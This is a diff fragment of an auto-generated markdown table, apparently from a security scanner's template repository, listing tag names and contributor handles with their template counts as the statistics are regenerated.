apisix | 5 | rschio | 1 | | | | | | | -| server | 5 | _darrenmartyn | 1 | | | | | | | -| kkfileview | 5 | nobody | 1 | | | | | | | -| geoserver | 5 | carrot2 | 1 | | | | | | | -| avideo | 5 | aron molnar | 1 | | | | | | | -| heroku | 5 | ynnirc | 1 | | | | | | | -| openemr | 5 | hczdmr | 1 | | | | | | | -| powerjob | 4 | borna nematzadeh | 1 | | | | | | | -| osint-archived | 4 | piyushchhiroliya | 1 | | | | | | | -| beyondtrust | 4 | yashanand155 | 1 | | | | | | | -| webshell | 4 | cookiehanhoan | 1 | | | | | | | -| redmine | 4 | philippdelteil | 1 | | | | | | | -| photo | 4 | mariam tariq | 1 | | | | | | | -| mostra | 4 | nerrorsec | 1 | | | | | | | -| churchcrm | 4 | regala_ | 1 | | | | | | | -| aura | 4 | nagli | 1 | | | | | | | -| tls | 4 | unkl4b | 1 | | | | | | | -| mailchimp | 4 | pascalheidmann | 1 | | | | | | | -| telesquare | 4 | pdp | 1 | | | | | | | -| phpinfo | 4 | mhdsamx | 1 | | | | | | | -| ems | 4 | daffianfo | 1 | | | | | | | -| telerik | 4 | ptonewreckin | 1 | | | | | | | -| jupyter | 4 | soyelmago | 1 | | | | | | | -| pie-register | 4 | breno_css | 1 | | | | | | | -| panos | 4 | exceed | 1 | | | | | | | -| centos | 4 | undefl0w | 1 | | | | | | | -| hpe | 4 | kabirsuda | 1 | | | | | | | -| sendgrid | 4 | ayadim | 1 | | | | | | | -| codeigniter | 4 | _c0wb0y_ | 1 | | | | | | | -| qdpm | 4 | d0rkerdevil | 1 | | | | | | | -| dropbear | 4 | sak1 | 1 | | | | | | | -| sonarqube | 4 | metascan | 1 | | | | | | | -| xmlrpc | 4 | bjhulst | 1 | | | | | | | -| log | 4 | revblock | 1 | | | | | | | -| linkerd | 4 | schniggie | 1 | | | | | | | -| gnuboard | 4 | af001 | 1 | | | | | | | -| candidats | 4 | kba@sogeti_esec | 1 | | | | | | | -| pixie | 4 | ndmalc | 1 | | | | | | | -| puppet | 4 | compr00t | 1 | | | | | | | -| httpserver | 4 | viondexd | 1 | | | | | | | -| roxy | 4 | notsoevilweasel | 1 | | | | | | | -| search | 4 | hakluke | 1 | | | | | | | -| elementor | 4 | 0ut0fb4nd | 1 | | | | | | | -| royalevent | 4 | affix | 1 | | | | | | | -| httpd | 4 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| spark | 4 | apt-mirror | 1 | | | | | | | -| couchdb | 4 | 0xteles | 1 | | | | | | | -| zte | 4 | zy9ard3 | 1 | | | | | | | -| flink | 4 | _harleo | 1 | | | | | | | -| bmc | 4 | clment cruchet | 1 | | | | | | | -| oa | 4 | xcapri | 1 | | | | | | | -| nosqli | 4 | luqman | 1 | | | | | | | -| froxlor | 4 | ayadi | 1 | | | | | | | -| ebs | 4 | shreyapohekar | 1 | | | | | | | -| mikrotik | 4 | xeldax | 1 | | | | | | | -| cve2005 | 4 | houdinis | 1 | | | | | | | -| openfire | 4 | absshax | 1 | | | | | | | -| bitbucket | 4 | william söderberg @ withsecure | 1 | | | | | | | -| cve2007 | 4 | dk999 | 1 | | | | | | | -| wcs | 4 | exploitation | 1 | | | | | | | -| hongdian | 4 | push4d | 1 | | | | | | | -| aspose | 4 | ahmetpergamum | 1 | | | | | | | -| mlflow | 4 | colbyjack1134 | 1 | | | | | | | -| dolibarr | 4 | bughuntersurya | 1 | | | | | | | -| voip | 4 | vzamanillo | 1 | | | | | | | -| age-encryption | 4 | b4uh0lz | 1 | | | | | | | -| axigen | 4 | nuts7 | 1 | | | | | | | -| nextjs | 4 | ramondunker | 1 | | | | | | | -| kentico | 4 | dabla | 1 | | | | | | | -| mostracms | 4 | oscarintherocks | 1 | | | | | | | -| mysql | 4 | arall | 1 | | | | | | | -| goanywhere | 4 | davidfegyver | 1 | | | | | | | -| consul | 4 | jeya seelan | 1 | | | | | | | -| artifactory | 4 | vinit989 | 1 | | | | | | | -| sangfor | 4 | realexp3rt | 1 | | | | | | | -| ampache | 4 | aayush vishnoi | 1 | | | | | | | -| express | 4 | flag007 | 1 | | | | | | | -| kevinlab | 4 | liquidsec | 1 | | | | | | | -| hoteldruid | 4 | guax1 | 1 | | | | | | | -| stripe | 4 | retr02332 | 1 | | | | | | | -| javascript | 4 | jcockhren | 1 | | | | | | | -| ldap | 4 | dali | 1 | | | | | | | -| kibana | 4 | jonathanwalker | 1 | | | | | | | -| webmin | 4 | ofjaaah | 1 | | | | | | | -| yeswiki | 4 | ooooooo_q | 1 | | | | | | | -| prtg | 4 | imhunterand | 1 | | | | | | | -| seagate | 4 | luskabol | 1 | | | | | | | -| rabbitmq | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| grav | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| postmessage | 4 | kchason | 1 | | | | | | | -| concrete | 4 | francescocarlucci | 1 | | | | | | | -| cloudflare | 4 | fq_hsu | 1 | | | | | | | -| pentaho | 4 | s1r1u5_ | 1 | | | | | | | -| springcloud | 4 | tarunkoyalwar | 1 | | | | | | | -| terramaster | 4 | tehtbl | 1 | | | | | | | -| newstatpress | 4 | 0xh7ml | 1 | | | | | | | -| jellyfin | 4 | momen eldawakhly | 1 | | | | | | | -| thinkcmf | 4 | justmumu | 1 | | | | | | | -| horde | 4 | elitebaz | 1 | | | | | | | -| arcgis | 4 | adrianmf | 1 | | | | | | | -| mautic | 4 | andirrahmani1 | 1 | | | | | | | -| tenda | 4 | evolutionsec | 1 | | | | | | | -| phppgadmin | 4 | aaronchen0 | 1 | | | | | | | -| umbraco | 4 | phyr3wall | 1 | | | | | | | -| cnvd2019 | 4 | intx0x80 | 1 | | | | | | | -| zend | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| postman | 3 | kurohost | 1 | | | | | | | -| qnap | 3 | 0xceba | 1 | | | | | | | -| proftpd | 3 | ling | 1 | | | | | | | -| fileman | 3 | act1on3 | 1 | | | | | | | -| kfm | 3 | zhenwarx | 1 | | | | | | | -| mapbox | 3 | lamscun | 1 | | | | | | | -| rackn | 3 | bad5ect0r | 1 | | | | | | | -| shiro | 3 | pudsec | 1 | | | | | | | -| nuuo | 3 | jbertman | 1 | | | | | | | -| actuator | 3 | wlayzz | 1 | | | | | | | -| 3cx | 3 | husain | 1 | | | | | | | -| matrix | 3 | gboddin | 1 | | | | | | | -| sysaid | 3 | shiva (strobes security) | 1 | | | | | | | -| rat | 3 | aravind | 1 | | | | | | | -| telegram | 3 | andysvints | 1 | | | | | | | -| waf | 3 | jub0bs | 1 | | | | | | | -| pega | 3 | alevsk | 1 | | | | | | | -| kingsoft | 3 | furkansayim | 1 | | | | | | | -| carel | 3 | danigoland | 1 | | | | | | | -| key | 3 | arliya | 1 | | | | | | | -| samba | 3 | nytr0gen | 1 | | | | | | | -| redash | 3 | iphantasmic | 1 | | | | | | | -| voipmonitor | 3 | alex | 1 | | | | | | | -| webcam | 3 | omarkurt | 1 | | | | | | | -| credential | 3 | screamy | 1 | | | | | | | -| xerox | 3 | furkansenan | 1 | | | | | | | -| cas | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| lighttpd | 3 | pussycat0 | 1 | | | | | | | -| rancher | 3 | infosecsanyam | 1 | | | | | | | -| intercom | 3 | zinminphy0 | 1 | | | | | | | -| sentry | 3 | higor melgaço | 1 | | | | | | | -| figma | 3 | 8authur | 1 | | | | | | | -| gradle | 3 | jc175 | 1 | | | | | | | -| sony | 3 | mbmy | 1 | | | | | | | -| dom | 3 | patrick pirker | 1 | | | | | | | -| axway | 3 | naglis | 1 | | | | | | | -| dos | 3 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| r-seenet | 3 | lixts | 1 | | | | | | | -| dubbo | 3 | booboohq | 1 | | | | | | | -| trendnet | 3 | wabafet | 1 | | | | | | | -| openstack | 3 | florianmaak | 1 | | | | | | | -| lansweeper | 3 | mukundbhuva | 1 | | | | | | | -| openbmcs | 3 | ahmed abou-ela | 1 | | | | | | | -| angular | 3 | ilovebinbash | 1 | | | | | | | -| digitalrebar | 3 | remonsec | 1 | | | | | | | -| fuelcms | 3 | sickwell | 1 | | | | | | | -| jeesns | 3 | erethon | 1 | | | | | | | -| processwire | 3 | mesaglio | 1 | | | | | | | -| panabit | 3 | secthebit | 1 | | | | | | | -| saltstack | 3 | dwbzn | 1 | | | | | | | -| pypi | 3 | miryangjung | 1 | | | | | | | -| eshop | 3 | juicypotato1 | 1 | | | | | | | -| nuget | 3 | jeya.seelan | 1 | | | | | | | -| trixbox | 3 | dawid-czarnecki | 1 | | | | | | | -| aptus | 3 | djoevanka | 1 | | | | | | | -| globalprotect | 3 | remi gascou (podalirius) | 1 | | | | | | | -| movable | 3 | yashgoti | 1 | | | | | | | -| backdrop | 3 | noobexploiter | 1 | | | | | | | -| dreambox | 3 | kaizensecurity | 1 | | | | | | | -| hsphere | 3 | nielsing | 1 | | | | | | | -| drawio | 3 | lrtk-coder | 1 | | | | | | | -| zeroshell | 3 | shifacyclewla | 1 | | | | | | | -| rocketchat | 3 | jiheon-dev | 1 | | | | | | | -| password | 3 | petruknisme | 1 | | | | | | | -| influxdb | 3 | 0xd0ff9 | 1 | | | | | | | -| selea | 3 | ramkrishna sawant | 1 | | | | | | | -| magnolia | 3 | couskito | 1 | | | | | | | -| chamilo | 3 | kiks7 | 1 | | | | | | | -| temenos | 3 | myst7ic | 1 | | | | | | | -| pulsar | 3 | anon-artist | 1 | | | | | | | -| tableau | 3 | thelicato | 1 | | | | | | | -| splunk | 3 | rotembar | 1 | | | | | | | -| purchase-order-management-system | 3 | lingtren | 1 | | | | | | | -| targa | 3 | blckraven | 1 | | | | | | | -| dotcms | 3 | ipanda | 1 | | | | | | | -| octobercms | 3 | xshuden | 1 | | | | | | | -| bruteforce | 3 | mrcl0wnlab | 1 | | | | | | | -| cluster | 3 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| monstra | 3 | am0nt31r0 | 1 | | | | | | | -| jfrog | 3 | rivalsec | 1 | | | | | | | -| bigant | 3 | y0no | 1 | | | | | | | -| rubygems | 3 | brabbit10 | 1 | | | | | | | -| metersphere | 3 | tea | 1 | | | | | | | -| openai | 3 | rodnt | 1 | | | | | | | -| wordfence | 3 | w0tx | 1 | | | | | | | -| weiphp | 3 | freakyclown | 1 | | | | | | | -| labkey | 3 | prettyboyaaditya | 1 | | | | | | | -| dzzoffice | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| ansible | 3 | deena | 1 | | | | | | | -| asus | 3 | tim_koopmans | 1 | | | | | | | -| empirecms | 3 | dmartyn | 1 | | | | | | | -| apollo | 3 | rubina119 | 1 | | | | | | | -| sitemap | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| httpbin | 3 | ransomsec | 1 | | | | | | | -| webalizer | 3 | duty_1g | 1 | | | | | | | -| mongo | 3 | droberson | 1 | | | | | | | -| finecms | 3 | h4kux | 1 | | | | | | | -| harbor | 3 | akokonunes | 1 | | | | | | | -| poms | 3 | yavolo | 1 | | | | | | | -| postgresql | 3 | ratnadip gajbhiye | 1 | | | | | | | -| airtable | 3 | mabdullah22 | 1 | | | | | | | -| gateway | 3 | whynotke | 1 | | | | | | | -| payara | 3 | jbaines-r7 | 1 | | | | | | | -| listserv | 3 | marcio mendes | 1 | | | | | | | -| bitrix | 3 | knassar702 | 1 | | | | | | | -| mailgun | 3 | aringo | 1 | | | | | | | -| teamcity | 3 | miroslavsotak | 1 | | | | | | | -| circleci | 3 | hakimkt | 1 | | | | | | | -| spip | 3 | shiar | 1 | | | | | | | -| fanruan | 3 | bywalks | 1 | | | | | | | -| superadmin | 3 | mah3sec_ | 1 | | | | | | | -| securepoint | 3 | akash.c | 1 | | | | | | | -| totolink | 3 | orpheus | 1 | | | | | | | -| ampps | 3 | izn0u | 1 | | | | | | | -| blockchain | 3 | michael wedl | 1 | | | | | | | -| pyload | 3 | ldionmarcil | 1 | | | | | | | -| sharepoint | 3 | hardik-rathod | 1 | | | | | | | -| getsimple | 3 | sshell | 1 | | | | | | | -| subrion | 3 | caon | 1 | | | | | | | -| yii | 3 | narluin | 1 | | | | | | | -| zerof | 3 | lark lab | 1 | | | | | | | -| pip | 3 | evan rubinstien | 1 | | | | | | | -| discourse | 3 | micha3lb3n | 1 | | | | | | | -| etcd | 3 | majidmc2 | 1 | | | | | | | -| loytec | 3 | makyotox | 1 | | | | | | | -| forum | 3 | 0xtavian | 1 | | | | | | | -| mcafee | 3 | gpiechnik2 | 1 | | | | | | | -| epson | 3 | berkdusunur | 1 | | | | | | | -| openam | 3 | bugvsme | 1 | | | | | | | -| graylog | 3 | palanichamy_perumal | 1 | | | | | | | -| metabase | 3 | stupidfish | 1 | | | | | | | -| linksys | 3 | p-l- | 1 | | | | | | | -| webadmin | 3 | kagamigawa | 1 | | | | | | | -| swagger | 3 | arjunchandarana | 1 | | | | | | | -| ueditor | 3 | topscoder | 1 | | | | | | | -| clusterengine | 3 | elouhi | 1 | | | | | | | -| steve | 3 | yuansec | 1 | | | | | | | -| geowebserver | 3 | esonhugh | 1 | | | | | | | -| wbce | 3 | shockwave | 1 | | | | | | | -| servicenow | 3 | chesterblue | 1 | | | | | | | -| kavita | 3 | chron0x | 1 | | | | | | | -| webkul-qloapps | 3 | un-fmunozs | 1 | | | | | | | -| superset | 3 | luqmaan hadia | 1 | | | | | | | -| rlm | 3 | marcos_iaf | 1 | | | | | | | -| twitter | 3 | becivells | 1 | | | | | | | -| unifi | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| linux | 3 | x6263 | 1 | | | | | | | -| sugarcrm | 3 | harshinsecurity | 1 | | | | | | | -| axis | 3 | sleepingbag945 | 1 | | | | | | | -| lotus | 3 | patralos | 1 | | | | | | | -| synology | 3 | charanrayudu | 1 | | | | | | | -| aria | 3 | mihhailsokolov | 1 | | | | | | | -| thinfinity | 3 | mantissts | 1 | | | | | | | -| ivanti | 3 | barthy.koeln | 1 | | | | | | | -| messaging | 3 | supr4s | 1 | | | | | | | -| fanwei | 3 | jrolf | 1 | | | | | | | -| graph | 3 | f1she3 | 1 | | | | | | | -| jwt | 3 | ok_bye_now | 1 | | | | | | | -| modem | 3 | pry0cc | 1 | | | | | | | -| glassfish | 3 | fmunozs | 1 | | | | | | | -| nortek | 3 | aaron_costello | 1 | | | | | | | +| aws | 35 | harshbothra_ | 7 | | | | | | | +| kubernetes | 35 | amit-jd | 7 | | | | | | | +| injection | 34 | caspergn | 7 | | | | | | | +| listing | 33 | techryptic (@tech) | 7 | | | | | | | +| deserialization | 31 | dr_set | 7 | | | | | | | +| misc | 31 | kophjager007 | 7 | | | | | | | +| osint-coding | 29 | divya_mudgal | 7 | | | | | | | +| cnvd | 29 | leovalcante | 7 | | | | | | | +| sap | 29 | adamcrosser | 7 | | | | | | | +| log4j | 28 | pentest_swissky | 6 | | | | | | | +| osint-tech | 28 | nodauf | 6 | | | | | | | +| php | 27 | __fazal | 6 | | | | | | | +| gitlab | 27 | xelkomy | 6 | | | | | | | +| proxy | 26 | justaacat | 6 | | | | | | | +| microsoft | 26 | evan rubinstein | 6 | | | | | | | +| api | 25 | gitlab red team | 6 | | | | | | | +| cve2012 | 25 | clem9669 | 6 | | | | | | | +| jndi | 25 | forgedhallpass | 6 | | | | | | | +| fuzz | 25 | puzzlepeaches | 6 | | | | | | | +| osint-business | 24 | praetorian-thendrickson | 6 | | | | | | | +| manageengine | 24 | devang-solanki | 6 | | | | | | | +| osint-finance | 24 | imnightmaree | 6 | | | | | | | +| firewall | 24 | pathtaga | 6 | | | | | | | +| osint-images | 24 | ja1sh | 6 | | | | | | | +| osint-shopping | 24 | noraj | 6 | | | | | | | +| amazon | 23 | prajiteshsingh | 5 | | | | | | | +| zoho | 23 | joanbono | 5 | | | | | | | +| c2 | 23 | r12w4n | 5 | | | | | | | +| k8s | 23 | panch0r3d | 5 | | | | | | | +| stored-xss | 23 | bhutch | 5 | | | | | | | +| wp-theme | 22 | defr0ggy | 5 | | | | | | | +| msf | 21 | ganofins | 5 | | | | | | | +| ibm | 21 | mr-xn | 5 | | | | | | | +| cloud | 21 | s0obi | 5 | | | | | | | +| weblogic | 21 | vicrack | 5 | | | | | | | +| tomcat | 21 | yanyun | 5 | | | | | | | +| fortinet | 20 | robotshell | 5 | | | | | | | +| cicd | 20 | kh4sh3i | 5 | | | | | | | +| struts | 19 | irshad ahamed | 5 | | | | | | | +| jenkins | 19 | podalirius | 5 | | | | | | | +| dns | 19 | tanq16 | 4 | | | | | | | +| admin | 19 | r3naissance | 4 | | | | | | | +| rukovoditel | 19 | 3th1c_yuk1 | 4 | | | | | | | +| ssl | 19 | e_schultze_ | 4 | | | | | | | +| github | 19 | h1ei1 | 4 | | | | | | | +| camera | 19 | shine | 4 | | | | | | | +| dlink | 19 | mastercho | 4 | | | | | | | +| osint-music | 18 | powerexploit | 4 | | | | | | | +| wavlink | 18 | kazet | 4 | | | | | | | +| ftp | 18 | incogbyte | 4 | | | | | | | +| lfr | 18 | scent2d | 4 | | | | | | | +| service | 18 | wisnupramoedya | 4 | | | | | | | +| ir | 17 | dolev farhi | 4 | | | | | | | +| cve2011 | 17 | dadevel | 4 | | | | | | | +| osint-blog | 16 | emenalf | 3 | | | | | | | +| nginx | 16 | jarijaas | 3 | | | | | | | +| xxe | 16 | fyoorer | 3 | | | | | | | +| cve2009 | 16 | skeltavik | 3 | | | | | | | +| backup | 16 | huowuzhao | 3 | | | | | | | +| printer | 16 | z3bd | 3 | | | | | | | +| android | 15 | alifathi-h1 | 3 | | | | | | | +| magento | 15 | sushantkamble | 3 | | | | | | | +| hp | 15 | dudez | 3 | | | | | | | +| cve2008 | 15 | _generic_human_ | 3 | | | | | | | +| status | 15 | bernardofsr | 3 | | | | | | | +| java | 15 | fxploit | 3 | | | | | | | +| citrix | 15 | me9187 | 3 | | | | | | | +| jboss | 14 | vsh00t | 3 | | | | | | | +| domainmod | 14 | arm!tage | 3 | | | | | | | +| mail | 14 | swissky | 3 | | | | | | | +| cve2013 | 14 | canberbamber | 3 | | | | | | | +| nodejs | 14 | andydoering | 3 | | | | | | | +| woocommerce | 14 | lucasljm2001 | 3 | | | | | | | +| confluence | 14 | dr0pd34d | 3 | | | | | | | +| zyxel | 14 | yash anand @yashanand155 | 3 | | | | | | | +| osint-health | 14 | badboycxcc | 3 | | | | | | | +| audit | 14 | true13 | 3 | | | | | | | +| osint-art | 14 | 0w4ys | 3 | | | | | | | +| npm | 13 | hahwul | 3 | | | | | | | +| tokens | 13 | splint3r7 | 3 | | | | | | | +| laravel | 13 | vagnerd | 3 | | | | | | | +| azure | 13 | shifacyclewala | 3 | | | | | | | +| abstractapi | 13 | arcc | 3 | | | | | | | +| fortigate | 13 | lark-lab | 3 | | | | | | | +| osint-dating | 13 | yuzhe-zhang-0 | 3 | | | | | | | +| osint-political | 13 | ambassify | 3 | | | | | | | +| cuppa | 13 | cheesymoon | 3 | | | | | | | +| creds-stuffing | 13 | evergreencartoons | 3 | | | | | | | +| login-check | 13 | ph33r | 3 | | | | | | | +| netsweeper | 12 | thomas_from_offensity | 3 | | | | | | | +| webserver | 12 | davidmckennirey | 3 | | | | | | | +| drupal | 12 | johnjhacking | 3 | | | | | | | +| airflow | 12 | mavericknerd | 3 | | | | | | | +| dashboard | 12 | unstabl3 | 3 | | | | | | | +| vpn | 12 | atomiczsec | 3 | | | | | | | +| kafka | 12 | matt galligan | 3 | | | | | | | +| rails | 12 | k0pak4 | 3 | | | | | | | +| ruby | 12 | f1tz | 3 | | | | | | | +| ruijie | 12 | binaryfigments | 3 | | | | | | | +| netgear | 12 | impramodsargar | 3 | | | | | | | +| microweber | 12 | taielab | 3 | | | | | | | +| backdoor | 12 | whoever | 3 | | | | | | | +| git | 12 | ekrause | 3 | | | | | | | +| grafana | 12 | smaranchand | 2 | | | | | | | +| enum | 12 | bananabr | 2 | | | | | | | +| graphql | 12 | raesene | 2 | | | | | | | +| auth | 12 | geekby | 2 | | | | | | | +| phpmyadmin | 11 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| xstream | 11 | foulenzer | 2 | | | | | | | +| setup | 11 | udit_thakkur | 2 | | | | | | | +| docker | 11 | myztique | 2 | | | | | | | +| cisa | 11 | luci | 2 | | | | | | | +| cnvd2021 | 11 | vavkamil | 2 | | | | | | | +| dell | 11 | joeldeleep | 2 | | | | | | | +| coldfusion | 11 | cckuakilong | 2 | | | | | | | +| online-fire-reporting | 11 | d4vy | 2 | | | | | | | +| osint-video | 11 | pxmme1337 | 2 | | | | | | | +| sonicwall | 11 | c3l3si4n | 2 | | | | | | | +| symfony | 10 | n-thumann | 2 | | | | | | | +| spring | 10 | uomogrande | 2 | | | | | | | +| solarview | 10 | cocxanh | 2 | | | | | | | +| ssti | 10 | 0xelkomy | 2 | | | | | | | +| dedecms | 10 | gtrrnr | 2 | | | | | | | +| ssh | 10 | randomdhiraj | 2 | | | | | | | +| glpi | 10 | thardt-praetorian | 2 | | | | | | | +| thinkphp | 10 | rafaelwdornelas | 2 | | | | | | | +| jolokia | 10 | 8arthur | 2 | | | | | | | +| digitalocean | 10 | m4lwhere | 2 | | | | | | | +| zimbra | 10 | coldfish | 2 | | | | | | | +| headless | 10 | bsysop | 2 | | | | | | | +| db | 10 | paradessia | 2 | | | | | | | +| django | 10 | kre80r | 2 | | | | | | | +| alibaba | 9 | 0xnirvana | 2 | | | | | | | +| cache | 9 | supras | 2 | | | | | | | +| node | 9 | ree4pwn | 2 | | | | | | | +| sitecore | 9 | parth | 2 | | | | | | | +| installer | 9 | hetroublemakr | 2 | | | | | | | +| pfsense | 9 | sy3omda | 2 | | | | | | | +| redis | 9 | ggranjus | 2 | | | | | | | +| wso2 | 9 | ricardo maia (brainfork) | 2 | | | | | | | +| gitea | 9 | g4l1t0 | 2 | | | | | | | +| windows | 9 | j3ssie | 2 | | | | | | | +| versa | 9 | github.com/its0x08 | 2 | | | | | | | +| prometheus | 9 | sascha brendel | 2 | | | | | | | +| firebase | 9 | codexlynx | 2 | | | | | | | +| fastjson | 9 | k11h-de | 2 | | | | | | | +| scada | 9 | sbani | 2 | | | | | | | +| bypass | 9 | megamansec | 2 | | | | | | | +| kube | 9 | notnotnotveg | 2 | | | | | | | +| iis | 9 | ehsahil | 2 | | | | | | | +| zabbix | 9 | shelled | 2 | | | | | | | +| osint-news | 9 | v0idc0de | 2 | | | | | | | +| opencats | 9 | danielmofer | 2 | | | | | | | +| vcenter | 9 | sinkettu | 2 | | | | | | | +| oauth | 8 | mohammedsaneem | 2 | | | | | | | +| unauthenticated | 8 | nkxxkn | 2 | | | | | | | +| exchange | 8 | thezakman | 2 | | | | | | | +| cnvd2020 | 8 | socketz | 2 | | | | | | | +| ecology | 8 | bing0o | 2 | | | | | | | +| icewarp | 8 | dbrwsky | 2 | | | | | | | +| metadata | 8 | convisoappsec | 2 | | | | | | | +| elasticsearch | 8 | bp0lr | 2 | | | | | | | +| vbulletin | 8 | streetofhackerr007 | 2 | | | | | | | +| ognl | 8 | nybble04 | 2 | | | | | | | +| recon | 8 | manas_harsh | 2 | | | | | | | +| jetbrains | 8 | dogancanbakir | 2 | | | | | | | +| console | 8 | kiblyn11 | 2 | | | | | | | +| smtp | 8 | nvn1729 | 2 | | | | | | | +| emerge | 8 | wa1tf0rme | 2 | | | | | | | +| crlf | 8 | heeress | 2 | | | | | | | +| keys | 8 | nuk3s3c | 2 | | | | | | | +| cisco-switch | 8 | clarkvoss | 2 | | | | | | | +| atom | 8 | korteke | 2 | | | | | | | +| solr | 8 | joshua rogers | 2 | | | | | | | +| spotweb | 8 | 666asd | 2 | | | | | | | +| druid | 8 | joshlarsen | 2 | | | | | | | +| hms | 8 | randomrobbie | 2 | | | | | | | +| default-page | 8 | amsda | 2 | | | | | | | +| bucket | 8 | gal nagli | 2 | | | | | | | +| mirai | 8 | lotusdll | 2 | | | | | | | +| config-audit | 8 | 0xsapra | 2 | | | | | | | +| odoo | 7 | y4er | 2 | | | | | | | +| go | 7 | hackerarpan | 2 | | | | | | | +| squirrelmail | 7 | lum8rjack | 2 | | | | | | | +| nagios | 7 | paperpen | 2 | | | | | | | +| gogs | 7 | martincodes-de | 2 | | | | | | | +| avtech | 7 | dheerajmadhukar | 2 | | | | | | | +| huawei | 7 | x1m_martijn | 2 | | | | | | | +| maps | 7 | 0xsmiley | 2 | | | | | | | +| vms | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| error | 7 | brucelsone | 2 | | | | | | | +| malware | 7 | moritz nentwig | 2 | | | | | | | +| ec2 | 7 | maximus decimus | 2 | | | | | | | +| blind | 7 | redteambrasil | 2 | | | | | | | +| sophos | 7 | gevakun | 2 | | | | | | | +| samsung | 7 | dahse89 | 2 | | | | | | | +| ofbiz | 7 | 0xrudra | 2 | | | | | | | +| shopify | 7 | z0ne | 2 | | | | | | | +| websphere | 7 | koti2 | 2 | | | | | | | +| seeyon | 7 | 0xprial | 2 | | | | | | | +| fortios | 7 | ajaysenr | 2 | | | | | | | +| nagiosxi | 7 | kishore-hariram | 2 | | | | | | | +| manager | 7 | israel comazzetto dos reis | 2 | | | | | | | +| plesk | 6 | w4cky_ | 2 | | | | | | | +| python | 6 | 0xcrypto | 2 | | | | | | | +| lucee | 6 | brenocss | 2 | | | | | | | +| doctor-appointment-system | 6 | zomsop82 | 2 | | | | | | | +| keycloak | 6 | afaq | 2 | | | | | | | +| minio | 6 | vinit989 | 1 | | | | | | | +| symantec | 6 | mantissts | 1 | | | | | | | +| s3 | 6 | ptonewreckin | 1 | | | | | | | +| solarwinds | 6 | bad5ect0r | 1 | | | | | | | +| nexus | 6 | miryangjung | 1 | | | | | | | +| liferay | 6 | nytr0gen | 1 | | | | | | | +| moodle | 6 | bjhulst | 1 | | | | | | | +| filemanager | 6 | ling | 1 | | | | | | | +| mongodb | 6 | kurohost | 1 | | | | | | | +| slack | 6 | daviey | 1 | | | | | | | +| opensis | 6 | mah3sec_ | 1 | | | | | | | +| openvpn | 6 | nielsing | 1 | | | | | | | +| elfinder | 6 | shivampand3y | 1 | | | | | | | +| activemq | 6 | irshadahamed | 1 | | | | | | | +| leak | 6 | orpheus | 1 | | | | | | | +| kubelet | 6 | toufik-airane | 1 | | | | | | | +| rconfig | 6 | pdp | 1 | | | | | | | +| zhiyuan | 6 | absshax | 1 | | | | | | | +| artica | 6 | erethon | 1 | | | | | | | +| database | 6 | sshell | 1 | | | | | | | +| pmb | 6 | rojanrijal | 1 | | | | | | | +| jeecg | 6 | bartu utku sarp | 1 | | | | | | | +| jamf | 6 | majidmc2 | 1 | | | | | | | +| bigip | 6 | nobody | 1 | | | | | | | +| tikiwiki | 6 | bywalks | 1 | | | | | | | +| microstrategy | 6 | higor melgaço | 1 | | | | | | | +| jetty | 6 | zhenwarx | 1 | | | | | | | +| secret | 6 | oscarintherocks | 1 | | | | | | | +| cobbler | 6 | ola456 | 1 | | | | | | | +| magmi | 6 | ipanda | 1 | | | | | | | +| fpd | 6 | micha3lb3n | 1 | | | | | | | +| newrelic | 6 | mass0ma | 1 | | | | | | | +| firmware | 5 | b0rn2r00t | 1 | | | | | | | +| rseenet | 5 | am0nt31r0 | 1 | | | | | | | +| resin | 5 | kiransau | 1 | | | | | | | +| adminer | 5 | 8authur | 1 | | | | | | | +| fatpipe | 5 | apt-mirror | 1 | | | | | | | +| hikvision | 5 | akash.c | 1 | | | | | | | +| server | 5 | exploitation | 1 | | | | | | | +| 74cms | 5 | sec_hawk | 1 | | | | | | | +| akamai | 5 | chron0x | 1 | | | | | | | +| rfi | 5 | 1nf1n7y | 1 | | | | | | | +| heroku | 5 | danigoland | 1 | | | | | | | +| facebook | 5 | shifacyclewla | 1 | | | | | | | +| strapi | 5 | arliya | 1 | | | | | | | +| gocd | 5 | 0xd0ff9 | 1 | | | | | | | +| geoserver | 5 | 0xteles | 1 | | | | | | | +| elastic | 5 | tea | 1 | | | | | | | +| paypal | 5 | keni0k | 1 | | | | | | | +| prestashop | 5 | tarunkoyalwar | 1 | | | | | | | +| typo3 | 5 | 0xrod | 1 | | | | | | | +| vrealize | 5 | izn0u | 1 | | | | | | | +| nacos | 5 | myst7ic | 1 | | | | | | | +| cacti | 5 | mhdsamx | 1 | | | | | | | +| square | 5 | noamrathaus | 1 | | | | | | | +| metinfo | 5 | clment cruchet | 1 | | | | | | | +| circarlife | 5 | official_blackhat13 | 1 | | | | | | | +| avideo | 5 | pratik khalane | 1 | | | | | | | +| awstats | 5 | supr4s | 1 | | | | | | | +| carrental | 5 | igibanez | 1 | | | | | | | +| asana | 5 | qlkwej | 1 | | | | | | | +| cockpit | 5 | queencitycyber | 1 | | | | | | | +| apisix | 5 | fopina | 1 | | | | | | | +| microfocus | 5 | adrianmf | 1 | | | | | | | +| avaya | 5 | marcio mendes | 1 | | | | | | | +| parallels | 5 | failopen | 1 | | | | | | | +| openemr | 5 | notsoevilweasel | 1 | | | | | | | +| hashicorp | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | +| storage | 5 | sak1 | 1 | | | | | | | +| sql | 5 | brabbit10 | 1 | | | | | | | +| ruckus | 5 | hakluke | 1 | | | | | | | +| kkfileview | 5 | luskabol | 1 | | | | | | | +| caucho | 5 | marcos_iaf | 1 | | | | | | | +| hybris | 5 | caon | 1 | | | | | | | +| asp | 5 | r3nz0 | 1 | | | | | | | +| photo | 4 | sleepingbag945 | 1 | | | | | | | +| thinkcmf | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| hoteldruid | 4 | ilovebinbash | 1 | | | | | | | +| gnuboard | 4 | 